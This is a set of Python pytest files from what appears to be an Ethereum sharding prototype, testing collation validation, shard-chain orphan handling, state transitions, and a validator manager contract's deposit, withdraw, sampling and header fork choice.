    tx1 = t.generate_shard_tx(tester.k2, tester.a4, int(0.03 * utils.denoms.ether))
    txqueue.add_transaction(tx1)
    # receipts_root
    collation = t.generate_collation(shardId=1, coinbase=tester.a1, key=tester.k1, txqueue=txqueue)
    period_start_prevblock = t.chain.get_block(collation.header.period_start_prevhash)
    # Set wrong root
    collation.header.receipts_root = trie.BLANK_ROOT
    with pytest.raises(ValueError):
        collator.apply_collation(state, collation, period_start_prevblock)
    # test 3 - arrange
    state = t.chain.shards[shardId].state
    txqueue = TransactionQueue()
    tx1 = t.generate_shard_tx(tester.k2, tester.a4, int(0.03 * utils.denoms.ether))
    txqueue.add_transaction(tx1)
    # tx_list_root (comment fixed: this case corrupts tx_list_root)
    collation = t.generate_collation(shardId=1, coinbase=tester.a1, key=tester.k1, txqueue=txqueue)
    period_start_prevblock = t.chain.get_block(collation.header.period_start_prevhash)
    # Set wrong root
    collation.header.tx_list_root = trie.BLANK_ROOT
    with pytest.raises(ValueError):
        collator.apply_collation(state, collation, period_start_prevblock)
--- FILE SEPARATOR ---
import pytest
import logging
from ethereum.slogging import get_logger
from sharding.tools import tester
from sharding.shard_chain import ShardChain
log = get_logger('test.shard_chain')
log.setLevel(logging.DEBUG)
def chain(shardId):
    """Build a tester.Chain tracking shard `shardId` with 5 mined blocks.

    This is a plain helper, not a pytest fixture: sibling test modules
    call it directly with an argument, and calling a
    @pytest.fixture-decorated function directly raises an error in
    modern pytest.
    """
    t = tester.Chain(env='sharding')
    t.add_test_shard(shardId)
    t.mine(5)
    return t
def test_init_shard():
    """init_shard registers each new id once and rejects duplicates."""
    tc = tester.Chain(env='sharding')
    assert tc.chain.init_shard(1)
    assert len(tc.chain.shard_id_list) == 1
    assert tc.chain.init_shard(2)
    assert len(tc.chain.shard_id_list) == 2
    # Re-initializing an existing shard is refused and changes nothing.
    assert not tc.chain.init_shard(2)
    assert len(tc.chain.shard_id_list) == 2
def test_add_shard():
    """add_shard tracks an existing ShardChain once and rejects re-adding."""
    tc = tester.Chain(env='sharding')
    shard = ShardChain(shardId=1)
    assert tc.chain.add_shard(shard)
    assert len(tc.chain.shard_id_list) == 1
    assert not tc.chain.add_shard(shard)
def test_get_expected_period_number():
    """Expected period number tracks (block_number + 1) // PERIOD_LENGTH."""
    tc = tester.Chain(env='sharding')
    tc.chain.init_shard(1)
    # (blocks to mine, expected period) -> heights 5, 9, 10.
    for blocks, expected in ((5, 1), (4, 2), (1, 2)):
        tc.mine(blocks)
        assert tc.chain.get_expected_period_number() == expected
def test_get_period_start_prevhash():
    """After 5 blocks, period 1 has a start-prevhash; period 2 does not yet."""
    tc = tester.Chain(env='sharding')
    tc.chain.init_shard(1)
    tc.mine(5)
    assert tc.chain.get_period_start_prevhash(1)
    assert tc.chain.get_period_start_prevhash(2) is None
def test_handle_orphan_collation():
    """Test handle_orphan_collation(self, collation, period_start_prevblock, handle_orphan_collation).

    A collator (t1) builds collation1 <- collation2 <- collation3 in
    order; a validator (t2) receives them out of order (2, 3, then 1)
    and must end up with the same scores once the orphans are replayed.

    NOTE(review): the t2 adds reuse `period_start_prevblock` left over
    from collation3 -- presumably all three collations share the same
    period in this 5-block setup; confirm.
    """
    shardId = 1
    # Collator: create and apply collation sequentially
    t1 = tester.Chain(env='sharding')
    t1.chain.init_shard(shardId)
    t1.mine(5)
    # collation1
    collation1 = t1.generate_collation(shardId=1, coinbase=tester.a1, key=tester.k1, txqueue=None)
    period_start_prevblock = t1.chain.get_block(collation1.header.period_start_prevhash)
    t1.chain.shards[shardId].add_collation(collation1, period_start_prevblock, t1.chain.handle_orphan_collation)
    assert t1.chain.shards[shardId].get_score(collation1) == 1
    # collation2
    collation2 = t1.generate_collation(shardId=1, coinbase=tester.a2, key=tester.k2, txqueue=None, prev_collation_hash=collation1.header.hash)
    period_start_prevblock = t1.chain.get_block(collation2.header.period_start_prevhash)
    t1.chain.shards[shardId].add_collation(collation2, period_start_prevblock, t1.chain.handle_orphan_collation)
    assert t1.chain.shards[shardId].get_score(collation2) == 2
    # collation3
    collation3 = t1.generate_collation(shardId=1, coinbase=tester.a2, key=tester.k2, txqueue=None, prev_collation_hash=collation2.header.hash)
    period_start_prevblock = t1.chain.get_block(collation3.header.period_start_prevhash)
    t1.chain.shards[shardId].add_collation(collation3, period_start_prevblock, t1.chain.handle_orphan_collation)
    assert t1.chain.shards[shardId].get_score(collation3) == 3
    # Validator: apply collation2, collation3 and collation1
    t2 = tester.Chain(env='sharding')
    t2.chain.init_shard(shardId)
    t2.mine(5)
    # append collation2
    t2.chain.shards[shardId].add_collation(collation2, period_start_prevblock, t2.chain.handle_orphan_collation)
    # append collation3
    t2.chain.shards[shardId].add_collation(collation3, period_start_prevblock, t2.chain.handle_orphan_collation)
    # append collation1 now
    t2.chain.shards[shardId].add_collation(collation1, period_start_prevblock, t2.chain.handle_orphan_collation)
    assert t2.chain.shards[shardId].get_score(collation1) == 1
    assert t2.chain.shards[shardId].get_score(collation2) == 2
    assert t2.chain.shards[shardId].get_score(collation3) == 3
--- FILE SEPARATOR ---
import pytest
import logging
from ethereum.utils import encode_hex
from ethereum.slogging import get_logger
from ethereum.transaction_queue import TransactionQueue
from ethereum import utils
from sharding.tools import tester
log = get_logger('test.shard_chain')
log.setLevel(logging.DEBUG)
def chain(shardId):
    """Build a tester.Chain tracking shard `shardId` with 5 mined blocks.

    This is a plain helper, not a pytest fixture: sibling test modules
    call it directly with an argument, and calling a
    @pytest.fixture-decorated function directly raises an error in
    modern pytest.
    """
    t = tester.Chain(env='sharding')
    t.add_test_shard(shardId)
    t.mine(5)
    return t
def test_add_collation():
    """Scores grow along a parent chain and restart at 1 for a new root."""
    shard_id = 1
    tc = tester.Chain(env='sharding')
    tc.chain.init_shard(shard_id)
    tc.mine(5)
    shard = tc.chain.shards[shard_id]
    log.info('head_state: {}'.format(shard.state.trie.root_hash))
    log.info('block_number: {}'.format(shard.state.block_number))

    def add(coll):
        # Look up the collation's own period-start block and apply it.
        prevblock = tc.chain.get_block(coll.header.period_start_prevhash)
        shard.add_collation(coll, prevblock, tc.chain.handle_orphan_collation)

    # parent = empty
    collation1 = tc.generate_collation(shardId=1, coinbase=tester.a1, key=tester.k1, txqueue=None)
    add(collation1)
    assert shard.get_score(collation1) == 1
    # parent = empty
    collation2 = tc.generate_collation(shardId=1, coinbase=tester.a2, key=tester.k1, txqueue=None)
    add(collation2)
    assert shard.get_score(collation2) == 1
    # parent = collation1
    collation3 = tc.generate_collation(shardId=1, coinbase=tester.a2, key=tester.k1, txqueue=None, prev_collation_hash=collation1.header.hash)
    add(collation3)
    assert shard.get_score(collation3) == 2
    # parent = collation3
    collation4 = tc.generate_collation(shardId=1, coinbase=tester.a2, key=tester.k1, txqueue=None, prev_collation_hash=collation3.header.hash)
    add(collation4)
    assert shard.get_score(collation4) == 3
def test_handle_orphan_collation():
    """Test handle_orphan_collation(self, collation, period_start_prevblock, handle_orphan_collation)

    A collator chain (t1) builds collations 1 -> 2 -> 3 in order. A validator
    chain (t2) then receives them out of order (2, 3, then 1): 2 and 3 are
    orphans until their ancestor 1 arrives, after which all three must carry
    the same scores as on the collator chain.
    """
    shardId = 1
    # Collator: create and apply collation sequentially
    t1 = tester.Chain(env='sharding')
    t1.chain.init_shard(shardId)
    t1.mine(5)
    # collation1
    collation1 = t1.generate_collation(shardId=1, coinbase=tester.a1, key=tester.k1, txqueue=None)
    period_start_prevblock = t1.chain.get_block(collation1.header.period_start_prevhash)
    t1.chain.shards[shardId].add_collation(collation1, period_start_prevblock, t1.chain.handle_orphan_collation)
    assert t1.chain.shards[shardId].get_score(collation1) == 1
    # collation2
    collation2 = t1.generate_collation(shardId=1, coinbase=tester.a2, key=tester.k2, txqueue=None, prev_collation_hash=collation1.header.hash)
    period_start_prevblock = t1.chain.get_block(collation2.header.period_start_prevhash)
    t1.chain.shards[shardId].add_collation(collation2, period_start_prevblock, t1.chain.handle_orphan_collation)
    assert t1.chain.shards[shardId].get_score(collation2) == 2
    # collation3
    collation3 = t1.generate_collation(shardId=1, coinbase=tester.a2, key=tester.k2, txqueue=None, prev_collation_hash=collation2.header.hash)
    period_start_prevblock = t1.chain.get_block(collation3.header.period_start_prevhash)
    t1.chain.shards[shardId].add_collation(collation3, period_start_prevblock, t1.chain.handle_orphan_collation)
    assert t1.chain.shards[shardId].get_score(collation3) == 3
    # Validator: apply collation2, collation3 and collation1
    t2 = tester.Chain(env='sharding')
    t2.chain.init_shard(shardId)
    t2.mine(5)
    # append collation2 (orphan: its parent is not known to t2 yet)
    t2.chain.shards[shardId].add_collation(collation2, period_start_prevblock, t2.chain.handle_orphan_collation)
    # append collation3 (also orphan)
    t2.chain.shards[shardId].add_collation(collation3, period_start_prevblock, t2.chain.handle_orphan_collation)
    # append collation1 now — should resolve the orphans transitively
    t2.chain.shards[shardId].add_collation(collation1, period_start_prevblock, t2.chain.handle_orphan_collation)
    assert t2.chain.shards[shardId].get_score(collation1) == 1
    assert t2.chain.shards[shardId].get_score(collation2) == 2
    assert t2.chain.shards[shardId].get_score(collation3) == 3
def test_transaction():
    """Test create and apply collation with transactions

    Two 0.03-ether shard transactions are queued, packed into a collation,
    and applied; the post-state must show the transfer and the collator
    incentive.
    """
    shardId = 1
    t = chain(shardId)
    log.info('head state: {}'.format(encode_hex(t.chain.shards[shardId].state.trie.root_hash)))
    tx1 = t.generate_shard_tx(tester.k2, tester.a4, int(0.03 * utils.denoms.ether))
    tx2 = t.generate_shard_tx(tester.k3, tester.a5, int(0.03 * utils.denoms.ether))
    # Prepare txqueue
    txqueue = TransactionQueue()
    txqueue.add_transaction(tx1)
    txqueue.add_transaction(tx2)
    collation = t.generate_collation(shardId=1, coinbase=tester.a1, key=tester.k1, txqueue=txqueue)
    log.debug('collation: {}, transaction_count:{}'.format(collation.to_dict(), collation.transaction_count))
    period_start_prevblock = t.chain.get_block(collation.header.period_start_prevhash)
    log.debug('period_start_prevblock: {}'.format(encode_hex(period_start_prevblock.header.hash)))
    t.chain.shards[shardId].add_collation(collation, period_start_prevblock, t.chain.handle_orphan_collation)
    state = t.chain.shards[shardId].mk_poststate_of_collation_hash(collation.header.hash)
    # Check the to-address received the value (1 ether starting balance + 0.03 ether)
    assert state.get_balance(tester.a4) == 1030000000000000000
    # Check incentives credited to the collation coinbase
    assert state.get_balance(tester.a1) == 1002000000000000000
def test_get_collation():
    """Test get_collation(self, collation_hash): an added collation can be
    fetched back by its header hash.
    """
    shardId = 1
    t = tester.Chain(env='sharding')
    t.chain.init_shard(shardId)
    t.mine(5)
    collation = t.generate_collation(shardId=1, coinbase=tester.a1, key=tester.k1, txqueue=None)
    period_start_prevblock = t.chain.get_block(collation.header.period_start_prevhash)
    t.chain.shards[shardId].add_collation(collation, period_start_prevblock, t.chain.handle_orphan_collation)
    assert t.chain.shards[shardId].get_collation(collation.header.hash).header.hash == collation.header.hash
def test_get_parent():
    """Test get_parent(self, collation) and is_first_collation(collation)."""
    t = tester.Chain(env='sharding')
    shardId = 1
    t.chain.init_shard(shardId)
    t.mine(5)
    collation = t.generate_collation(shardId=1, coinbase=tester.a1, key=tester.k1, txqueue=None)
    period_start_prevblock = t.chain.get_block(collation.header.period_start_prevhash)
    t.chain.shards[shardId].add_collation(collation, period_start_prevblock, t.chain.handle_orphan_collation)
    # first collation: built on the empty parent
    assert t.chain.shards[shardId].is_first_collation(collation)
    # append to previous collation
    collation = t.generate_collation(shardId=1, coinbase=tester.a1, key=tester.k1, txqueue=None, prev_collation_hash=collation.header.hash)
    period_start_prevblock = t.chain.get_block(collation.header.period_start_prevhash)
    t.chain.shards[shardId].add_collation(collation, period_start_prevblock, t.chain.handle_orphan_collation)
    assert not t.chain.shards[shardId].is_first_collation(collation)
    # get_parent must return the collation whose hash is recorded in the header
    assert t.chain.shards[shardId].get_parent(collation).header.hash == collation.header.parent_collation_hash
# TODO: after add_block
# def test_get_head_collation():
# """Test get_head_collation(blockhash)
# """
# shardId = 1
# t = chain(shardId)
# tx1 = t.generate_shard_tx(tester.k2, tester.a4, int(0.03 * utils.denoms.ether))
# txqueue = TransactionQueue()
# txqueue.add_transaction(tx1)
# collation = t.generate_collation(shardId=1, coinbase=tester.a1, txqueue=txqueue)
# period_start_prevblock = t.chain.get_block(collation.header.period_start_prevhash)
# t.chain.shards[shardId].add_collation(collation, period_start_prevblock, t.chain.handle_orphan_collation)
# log.info('state: {}'.format(encode_hex(t.chain.shards[shardId].state.trie.root_hash)))
# blockhash = t.chain.head_hash
# # print('head_collation: %s' % encode_hex(t.chain.shards[shardId].get_head_collation(blockhash).header.hash))
# assert t.chain.shards[shardId].get_head_collation(blockhash) is not None
--- FILE SEPARATOR ---
import pytest
import logging
from ethereum.state import State
from ethereum.transaction_queue import TransactionQueue
from ethereum import utils
from ethereum.slogging import get_logger
from ethereum.common import mk_transaction_sha, mk_receipt_sha
from ethereum import trie
from sharding.collation import Collation, CollationHeader
from sharding import state_transition
from sharding.tools import tester
log = get_logger('test.shard_chain')
log.setLevel(logging.DEBUG)
shardId = 1
@pytest.fixture(scope='function')
def chain(shardId):
    """Build a sharding tester Chain with shard *shardId* added and 5 blocks mined.

    NOTE(review): tests in this module call ``chain(shardId)`` directly with
    the module-level ``shardId`` constant rather than through fixture
    injection; the fixture parameter shadows that module global.
    """
    t = tester.Chain(env='sharding')
    t.add_test_shard(shardId)
    t.mine(5)
    return t
def test_mk_collation_from_prevstate():
    """Test mk_collation_from_prevstate(shard_chain, state, coinbase)"""
    t = chain(shardId)
    coinbase = tester.a1
    state = t.chain.shards[shardId].state
    collation = state_transition.mk_collation_from_prevstate(t.chain.shards[shardId], state, coinbase)
    # A fresh collation: hashed, on the right shard, rooted in the given
    # pre-state, credited to the coinbase, and with no transactions yet.
    assert collation.hash is not None
    assert collation.header.shardId == 1
    assert collation.header.prev_state_root == state.trie.root_hash
    assert collation.header.coinbase == coinbase
    assert not collation.transactions
def test_add_transactions():
    """Test add_transactions(state, collation, txqueue, min_gasprice=0)"""
    t = chain(shardId)
    tx1 = t.generate_shard_tx(tester.k2, tester.a4, int(0.03 * utils.denoms.ether))
    tx2 = t.generate_shard_tx(tester.k3, tester.a5, int(0.03 * utils.denoms.ether))
    txqueue = TransactionQueue()
    txqueue.add_transaction(tx1)
    txqueue.add_transaction(tx2)
    coinbase = tester.a1
    # Work on an ephemeral clone so the shard's canonical state is untouched.
    state = t.chain.shards[shardId].state.ephemeral_clone()
    collation = state_transition.mk_collation_from_prevstate(t.chain.shards[shardId], state, coinbase)
    state_transition.add_transactions(state, collation, txqueue)
    assert collation.transaction_count == 2
    # Recipient a4 starts with 1 ether and receives 0.03 ether from tx1.
    assert state.get_balance(tester.a4) == 1 * utils.denoms.ether + int(0.03 * utils.denoms.ether)
def test_update_collation_env_variables():
    """Verify update_collation_env_variables(state, collation) copies the
    collation's coinbase into the state's block_coinbase.
    """
    env_state = State()
    dummy_collation = Collation(CollationHeader(coinbase=tester.a2))
    state_transition.update_collation_env_variables(env_state, dummy_collation)
    assert env_state.block_coinbase == tester.a2
def test_set_execution_results():
    """Test set_execution_results(state, collation)"""
    collation = Collation(CollationHeader(coinbase=tester.a2))
    state = State()
    state_transition.set_execution_results(state, collation)
    # The header must commit to the receipts, the transaction list,
    # and the post-execution state root.
    assert collation.header.receipts_root == mk_receipt_sha(state.receipts)
    assert collation.header.tx_list_root == mk_transaction_sha(collation.transactions)
    assert collation.header.post_state_root == state.trie.root_hash
def test_validate_transaction_tree():
    """Test validate_transaction_tree(collation)"""
    t = chain(shardId)
    tx1 = t.generate_shard_tx(tester.k2, tester.a4, int(0.03 * utils.denoms.ether))
    tx2 = t.generate_shard_tx(tester.k3, tester.a5, int(0.03 * utils.denoms.ether))
    txqueue = TransactionQueue()
    txqueue.add_transaction(tx1)
    txqueue.add_transaction(tx2)
    collation = t.generate_collation(shardId=1, coinbase=tester.a1, key=tester.k1, txqueue=txqueue)
    # A freshly generated collation has a consistent tx-list root.
    assert state_transition.validate_transaction_tree(collation)
    # Corrupt the committed root: validation must now raise.
    collation.header.tx_list_root = trie.BLANK_ROOT
    with pytest.raises(ValueError):
        state_transition.validate_transaction_tree(collation)
def test_finalize():
    """Test finalize(state, coinbase): the collator reward is credited."""
    # NOTE(review): coinbase here is a str of '\x35' characters while the
    # tester addresses (e.g. tester.a1) used elsewhere are bytes — confirm
    # str addresses are accepted by get_balance on Python 3.
    coinbase = '\x35'*20
    t = chain(shardId)
    state = t.chain.shards[shardId].state
    state_transition.finalize(state, coinbase)
    assert state.get_balance(coinbase) == int(state.config['COLLATOR_REWARD'])
--- FILE SEPARATOR ---
import pytest
import rlp
from ethereum import utils
from ethereum.slogging import LogRecorder, configure_logging, set_level
from sharding.tools import tester as t
from ethereum.transactions import Transaction
from rlp.sedes import List, binary
from sharding.validator_manager_utils import (get_valmgr_addr,
get_valmgr_ct,
get_valmgr_code,
mk_initiating_contracts,
mk_validation_code, sighasher_tx,
sign, viper_rlp_decoder_tx)
config_string = ":info,:debug"
'''
from ethereum.slogging import LogRecorder, configure_logging, set_level
config_string = ':info,eth.vm.log:trace,eth.vm.op:trace,eth.vm.stack:trace,eth.vm.exit:trace,eth.pb.msg:trace,eth.pb.tx:debug'
configure_logging(config_string=config_string)
'''
validator_manager_code = get_valmgr_code()
def test_validator_manager():
    """End-to-end exercise of the validator manager contract:
    deposit/withdraw bookkeeping (including slot reuse), validator sampling,
    add_header validation and shard-head fork choice.
    """
    # Must pay 100 ETH to become a validator
    deposit_size = 10 ** 20
    withdraw_msg_hash = utils.sha3("withdraw")
    c = t.Chain()
    k0_valcode_addr = c.tx(t.k0, '', 0, mk_validation_code(t.a0))
    k1_valcode_addr = c.tx(t.k1, '', 0, mk_validation_code(t.a1))
    num_blocks = 11
    c.mine(num_blocks - 1, coinbase=t.a0)
    c.head_state.gas_limit = 10 ** 12
    c.head_state.set_balance(address=t.a0, value=deposit_size * 10)
    c.head_state.set_balance(address=t.a1, value=deposit_size * 10)
    # deploy valmgr and its prerequisite contracts and transactions
    txs = mk_initiating_contracts(t.k0, c.head_state.get_nonce(t.a0))
    for tx in txs:
        try:
            c.direct_tx(tx)
        except t.TransactionFailed:
            # best-effort: some prerequisites may already be on-chain
            pass
    x = t.ABIContract(c, get_valmgr_ct(), get_valmgr_addr())
    # test deposit: fails when msg.value != deposit_size
    with pytest.raises(t.TransactionFailed):
        x.deposit(k0_valcode_addr, k0_valcode_addr)
    # test withdraw: fails when no validator record
    assert not x.withdraw(0, sign(withdraw_msg_hash, t.k0))
    # test deposit: works fine — validators get indices 0 and 1
    return_addr = utils.privtoaddr(utils.sha3("return_addr"))
    assert 0 == x.deposit(k0_valcode_addr, return_addr, value=deposit_size, sender=t.k0)
    assert 1 == x.deposit(k1_valcode_addr, return_addr, value=deposit_size, sender=t.k1)
    assert x.withdraw(0, sign(withdraw_msg_hash, t.k0))
    # test withdraw: see if the money is returned
    assert c.head_state.get_balance(return_addr) == deposit_size
    # test deposit: make use of empty slots (slot 0 was freed above)
    assert 0 == x.deposit(k0_valcode_addr, return_addr, value=deposit_size, sender=t.k0)
    assert x.withdraw(1, sign(withdraw_msg_hash, t.k1))
    # test deposit: working fine in the edge condition
    assert 1 == x.deposit(k1_valcode_addr, return_addr, value=deposit_size, sender=t.k1)
    # test deposit: fails when valcode_addr is deposited before
    with pytest.raises(t.TransactionFailed):
        x.deposit(k1_valcode_addr, return_addr, value=deposit_size, sender=t.k1)
    # test withdraw: fails when the signature is not corret (signed by wrong key)
    assert not x.withdraw(1, sign(withdraw_msg_hash, t.k0))
    # test sample: correctly sample the only one validator
    assert x.withdraw(0, sign(withdraw_msg_hash, t.k0))
    assert x.sample(0) == hex(utils.big_endian_to_int(k1_valcode_addr))
    # test sample: sample returns zero_addr (i.e. 0x00) when there is no depositing validator
    assert x.withdraw(1, sign(withdraw_msg_hash, t.k1))
    assert x.sample(0) == "0x0000000000000000000000000000000000000000"
    assert 1 == x.deposit(k0_valcode_addr, return_addr, value=deposit_size, sender=t.k0)

    def get_colhdr(shard_id, parent_collation_hash, collation_coinbase=t.a0):
        # Build and sign (with t.k0) an RLP-encoded collation header for
        # `shard_id` whose parent is `parent_collation_hash`.
        # Closes over `c` and `num_blocks` from the enclosing test.
        period_length = 5
        expected_period_number = num_blocks // period_length
        b = c.chain.get_block_by_number(expected_period_number * period_length - 1)
        period_start_prevhash = b.header.hash
        tx_list_root = b"tx_list " * 4
        post_state_root = b"post_sta" * 4
        receipt_root = b"receipt " * 4
        sighash = utils.sha3(
            rlp.encode([
                shard_id, expected_period_number, period_start_prevhash,
                parent_collation_hash, tx_list_root, collation_coinbase,
                post_state_root, receipt_root
            ])
        )
        sig = sign(sighash, t.k0)
        return rlp.encode([
            shard_id, expected_period_number, period_start_prevhash,
            parent_collation_hash, tx_list_root, collation_coinbase,
            post_state_root, receipt_root, sig
        ])

    header_logs = []
    add_header_topic = utils.big_endian_to_int(utils.sha3("add_header()"))

    def header_event_watcher(log):
        # NOTE(review): the next line is a no-op expression statement —
        # it looks like a leftover `nonlocal`/`global` declaration. The
        # closure still works because `header_logs` is only mutated
        # (append/pop), never rebound.
        header_logs, add_header_topic
        # print the last log and store the recent received one
        if log.topics[0] == add_header_topic:
            # print(log.data)
            header_logs.append(log.data)
            if len(header_logs) > 1:
                last_log = header_logs.pop(0)
                # [num, num, bytes32, bytes32, bytes32, address, bytes32, bytes32, bytes]
                # use sedes to prevent integer 0 from being decoded as b''
                sedes = List([utils.big_endian_int, utils.big_endian_int, utils.hash32, utils.hash32, utils.hash32, utils.address, utils.hash32, utils.hash32, binary])
                values = rlp.decode(last_log, sedes)
                print("add_header: shard_id={}, expected_period_number={}, header_hash={}, parent_header_hash={}".format(values[0], values[1], utils.sha3(last_log), values[3]))

    c.head_state.log_listeners.append(header_event_watcher)
    shard_id = 0
    shard0_genesis_colhdr_hash = utils.encode_int32(0)
    # test get_shard_head: returns genesis_colhdr_hash when there is no new header
    # NOTE(review): called without a shard argument here but as
    # get_shard_head(0) below — confirm both call forms are valid.
    assert x.get_shard_head() == shard0_genesis_colhdr_hash
    # test add_header: works normally with parent_collation_hash == GENESIS
    h1 = get_colhdr(shard_id, shard0_genesis_colhdr_hash)
    h1_hash = utils.sha3(h1)
    assert x.add_header(h1)
    # test add_header: fails when the header is added before
    with pytest.raises(t.TransactionFailed):
        h1 = get_colhdr(shard_id, shard0_genesis_colhdr_hash)
        result = x.add_header(h1)
    # test add_header: fails when the parent_collation_hash is not added before
    with pytest.raises(t.TransactionFailed):
        h2 = get_colhdr(shard_id, utils.sha3("123"))
        result = x.add_header(h2)
    # test add_header: the log is generated normally
    h2 = get_colhdr(shard_id, h1_hash)
    h2_hash = utils.sha3(h2)
    assert x.add_header(h2)
    latest_log_hash = utils.sha3(header_logs[-1])
    assert h2_hash == latest_log_hash
    # test get_shard_head: get the correct head when a new header is added
    assert x.get_shard_head(0) == h2_hash
    # test get_shard_head: get the correct head when a fork happened
    h1_prime = get_colhdr(shard_id, shard0_genesis_colhdr_hash, collation_coinbase=t.a1)
    h1_prime_hash = utils.sha3(h1_prime)
    assert x.add_header(h1_prime)
    h2_prime = get_colhdr(shard_id, h1_prime_hash, collation_coinbase=t.a1)
    h2_prime_hash = utils.sha3(h2_prime)
    assert x.add_header(h2_prime)
    # fork of equal length: the head must not switch yet
    assert x.get_shard_head(0) == h2_hash
    h3_prime = get_colhdr(shard_id, h2_prime_hash, collation_coinbase=t.a1)
    h3_prime_hash = utils.sha3(h3_prime)
    assert x.add_header(h3_prime)
    # the longer fork wins
    assert x.get_shard_head(0) == h3_prime_hash
    # NOTE(review): the string below is dead code kept as a disabled slow test.
    '''
    # test get_ancestor: h3_prime's height is too low so and it doesn't have a
    # 10000th ancestor. So it should fail.
    with pytest.raises(t.TransactionFailed):
        ancestor_10000th_hash = x.get_ancestor(shard_id, h3_prime_hash)
    # test get_ancestor:
    # TODO: figure out a better test instead of adding headers one by one.
    # This test takes few minutes. For now, you can adjust the `kth_ancestor`
    # to a smaller number here, and the same number of iterations of the `for`
    # loop in `get_ancestor` in the validator_manager contract.
    current_height = 3 # h3_prime
    kth_ancestor = 10000
    current_colhdr_hash = h3_prime_hash
    # add (kth_ancestor - current_height) headers to get the genesis as the ancestor
    for i in range(kth_ancestor - current_height):
        current_colhdr = get_colhdr(shard_id, current_colhdr_hash, collation_coinbase=t.a1)
        assert x.add_header(current_colhdr)
        current_colhdr_hash = utils.sha3(current_colhdr)
    assert x.get_ancestor(shard_id, current_colhdr_hash) == shard0_genesis_colhdr_hash
    '''
--- FILE SEPARATOR ---
import pytest
import rlp
from ethereum import utils
from ethereum.messages import apply_transaction
from ethereum.transactions import Transaction
from sharding.config import sharding_config
from sharding.tools import tester as t
from sharding.validator_manager_utils import (GASPRICE, STARTGAS, call_deposit,
call_sample,
call_validation_code,
call_withdraw, call_add_header,
call_get_shard_head,
call_get_collation_gas_limit,
get_valmgr_addr,
mk_initiating_contracts,
mk_validation_code, sign)
deposit_size = 10 ** 20
withdraw_hash = utils.sha3("withdraw")
config_string = ":info,:debug"
'''
from ethereum.slogging import LogRecorder, configure_logging, set_level
config_string = ':info,eth.vm.log:trace,eth.vm.op:trace,eth.vm.stack:trace,eth.vm.exit:trace,eth.pb.msg:trace,eth.pb.tx:debug'
configure_logging(config_string=config_string)
'''
# Testing Part
def deploy_tx(state, tx):
    """Apply *tx* to *state*, returning its output or raising on failure."""
    ok, result = apply_transaction(state, tx)
    if ok:
        return result
    raise t.TransactionFailed("Failed to deploy tx")
def deploy_contract(state, sender_privkey, bytecode):
    """Create, sign, and apply a contract-creation transaction.

    Returns the output of applying the transaction (the new contract address).
    """
    nonce = state.get_nonce(utils.privtoaddr(sender_privkey))
    create_tx = Transaction(nonce, GASPRICE, STARTGAS, to=b'', value=0, data=bytecode)
    signed_tx = create_tx.sign(sender_privkey)
    return deploy_tx(state, signed_tx)
def deploy_initializing_contracts(sender_privkey, state):
    """Deploy the validator-manager prerequisite contracts/transactions.

    Failures are deliberately swallowed: this is best-effort, idempotent
    setup — some of the initiating transactions may already be on-chain.
    """
    sender_addr = utils.privtoaddr(sender_privkey)
    txs = mk_initiating_contracts(sender_privkey, state.get_nonce(sender_addr))
    for tx in txs:
        try:
            deploy_tx(state, tx)
        except t.TransactionFailed:
            pass
num_blocks = 6
@pytest.fixture
def chain():
    """An initialized chain from ethereum.tester.Chain

    Mines num_blocks - 1 blocks, raises the gas limit, funds a0/a1, and
    deploys the validator-manager prerequisite contracts.
    """
    c = t.Chain()
    c.mine(num_blocks - 1, coinbase=t.a0)
    c.head_state.gas_limit = 10 ** 12
    c.head_state.set_balance(address=t.a0, value=deposit_size * 10)
    c.head_state.set_balance(address=t.a1, value=deposit_size * 10)
    deploy_initializing_contracts(t.k0, c.head_state)
    return c
def test_call_deposit_withdraw_sample(chain):
    """Deposit a validator, sample it, withdraw it, and run its valcode."""
    state = chain.head_state
    k0_valcode_addr = deploy_contract(state, t.k0, mk_validation_code(t.a0))
    tx = call_deposit(state, t.k0, deposit_size, k0_valcode_addr, t.a2)
    deploy_tx(state, tx)
    # after depositing, validator 0 is the sampled valcode address
    assert hex(utils.big_endian_to_int(k0_valcode_addr)) == \
        hex(utils.big_endian_to_int(call_sample(state, 0)))
    tx = call_withdraw(state, t.k0, 0, 0, sign(withdraw_hash, t.k0))
    deploy_tx(state, tx)
    # after withdrawing, sampling yields the zero address
    assert 0 == utils.big_endian_to_int(call_sample(state, 0))
    # the validation code accepts a signature over withdraw_hash by t.k0
    assert call_validation_code(state, k0_valcode_addr, withdraw_hash, sign(withdraw_hash, t.k0))
def test_call_add_header_get_shard_head(chain):
    """Register a validator, add one collation header via call_add_header,
    and verify call_get_shard_head reflects the new head.
    """
    state = chain.head_state

    def get_colhdr(shard_id, parent_collation_hash, collation_coinbase=t.a0):
        # Build and sign (with t.k0) an RLP-encoded collation header for
        # `shard_id`; closes over `chain` and the module-level `num_blocks`.
        period_length = 5
        expected_period_number = num_blocks // period_length
        b = chain.chain.get_block_by_number(expected_period_number * period_length - 1)
        period_start_prevhash = b.header.hash
        tx_list_root = b"tx_list " * 4
        post_state_root = b"post_sta" * 4
        receipt_root = b"receipt " * 4
        sighash = utils.sha3(
            rlp.encode([
                shard_id, expected_period_number, period_start_prevhash,
                parent_collation_hash, tx_list_root, collation_coinbase,
                post_state_root, receipt_root
            ])
        )
        sig = sign(sighash, t.k0)
        return rlp.encode([
            shard_id, expected_period_number, period_start_prevhash,
            parent_collation_hash, tx_list_root, collation_coinbase,
            post_state_root, receipt_root, sig
        ])

    shard0_genesis_colhdr_hash = utils.encode_int32(0)
    colhdr = get_colhdr(0, shard0_genesis_colhdr_hash)
    colhdr_hash = utils.sha3(colhdr)
    # before any header is added, the head is the genesis header hash
    assert call_get_shard_head(state, 0) == shard0_genesis_colhdr_hash
    # register t.k0 as the validators
    k0_valcode_addr = deploy_contract(state, t.k0, mk_validation_code(t.a0))
    tx = call_deposit(state, t.k0, deposit_size, k0_valcode_addr, t.a2)
    deploy_tx(state, tx)
    # `add_header` verifies whether the colhdr is signed by the current
    # selected validator, using `sample`
    tx = call_add_header(state, t.k0, 0, colhdr)
    deploy_tx(state, tx)
    assert colhdr_hash == call_get_shard_head(state, 0)
def test_valmgr_addr_in_sharding_config():
    """The configured validator-manager address must equal the derived one."""
    expected = utils.checksum_encode(get_valmgr_addr())
    assert sharding_config['VALIDATOR_MANAGER_ADDRESS'] == expected
|
[
"/sharding/collator.py",
"/sharding/config.py",
"/sharding/main_chain.py",
"/sharding/shard_chain.py",
"/sharding/tests/test_collator.py",
"/sharding/tests/test_main_chain.py",
"/sharding/tests/test_shard_chain.py",
